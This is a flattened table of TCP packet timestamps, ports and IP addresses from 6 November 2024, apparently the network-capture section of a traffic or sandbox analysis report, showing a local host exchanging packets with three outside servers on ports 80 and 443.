                                                                                                                                            Nov 6, 2024 16:40:40.858498096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.858551025 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.858571053 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.858582973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.858613968 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.899523020 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.899547100 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.899563074 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.899599075 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.899643898 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.191801071 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191836119 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191848993 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191867113 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191885948 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191895962 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.191900969 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191915035 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191926003 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.191926003 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191939116 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191951990 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191955090 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.191965103 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191972971 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.191977024 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191988945 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.191991091 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192018986 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192039013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192043066 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192050934 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192068100 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192091942 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192114115 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192117929 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192122936 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192135096 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192147017 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192154884 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192157984 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192171097 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192184925 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192188978 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192199945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192203045 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192214966 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192226887 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192239046 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192240000 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192250967 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192261934 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192275047 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192281008 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192286968 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192292929 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192303896 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192310095 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192326069 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192332983 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192344904 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192357063 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192363977 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192378998 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192392111 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192403078 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192403078 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192418098 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192431927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192442894 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192444086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192456007 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192459106 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192488909 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192517996 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.192539930 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.192555904 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.197454929 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.197513103 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.197542906 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.197561979 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:41.396745920 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:41.402596951 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:41.402678013 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:41.403122902 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:41.408988953 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.767534018 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.767554045 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.767568111 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.767580032 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.767617941 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:42.767672062 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:42.771442890 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.771497965 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:43.000514984 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:43.000559092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:43.000643015 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:43.003392935 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:43.003411055 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:44.419972897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:44.420042992 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:44.446039915 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:44.446069002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:44.446343899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:44.446399927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:44.448285103 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:44.491334915 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.204159021 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.204185963 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.204201937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.204252005 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.204283953 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.204293966 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.204333067 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.322803020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.322829962 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.322963953 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.322989941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.323705912 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.442006111 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.442028046 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.442087889 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.442105055 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.442154884 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.561420918 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.561445951 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.561577082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.561594009 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.561633110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.680700064 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680732012 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680850983 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.680871964 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680911064 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.800035000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800061941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800199032 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.800216913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800255060 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.928385019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928450108 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928544044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.928560019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928597927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962694883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962749004 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962789059 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962807894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962829113 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962850094 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.047702074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.047765970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.047780991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.047801971 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.047831059 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.047856092 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.160054922 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.160128117 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.160351992 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.160383940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.160429001 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.278538942 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.278584957 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.278747082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.278788090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.278846025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.321088076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.321139097 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.321178913 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.321202993 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.321232080 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.321265936 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.405440092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.405467033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.405706882 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.405734062 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.405776978 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.517539024 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.517565966 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.517678022 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.517748117 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.517817020 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.838931084 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.838958979 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839051962 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839138985 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839185953 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839186907 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839283943 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839299917 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839339018 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839353085 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839386940 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839401960 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839596033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839612007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839668989 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.839683056 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.839730024 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.844686985 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.844707012 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.844816923 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.844832897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.844886065 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.876591921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.876610041 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.876718044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.876759052 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.876810074 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.995294094 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.995326996 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.995424986 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.995503902 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.995556116 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.001902103 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.001926899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.002007961 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.002075911 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.002140045 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.117938995 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.117965937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.118038893 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.118105888 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.118166924 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.118168116 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.121347904 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.121368885 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.121522903 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.121556044 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.121602058 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.237104893 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.237129927 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.237293959 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.237323046 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.237375975 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.240343094 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.240367889 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.240425110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.240442991 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.240484953 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.356237888 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.356264114 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.356395006 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.356435061 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.356479883 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.359535933 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.359555960 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.359644890 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.359671116 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.359714031 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.475477934 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.475511074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.475641966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.475663900 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.475714922 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.478535891 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.478557110 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.478635073 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.478638887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.478684902 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.594587088 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.594616890 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.594696999 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.594723940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.594916105 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.597642899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.597665071 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.597748041 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.597753048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.597819090 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.674160957 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.674195051 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.674233913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.674428940 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.674454927 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.674494982 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.714975119 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.715004921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.715127945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.715156078 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.715199947 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.760659933 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.760689020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.760838032 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.760905027 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.760977030 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.833513975 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.833540916 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.833626032 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.833672047 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.833738089 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.836488962 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.836508989 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.836569071 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.836580992 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.836626053 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.933010101 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.933037043 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.933163881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.933193922 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.933260918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.953218937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.953238964 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.953362942 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:47.953442097 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:47.953502893 CET57356443192.168.2.10113.200.1.7
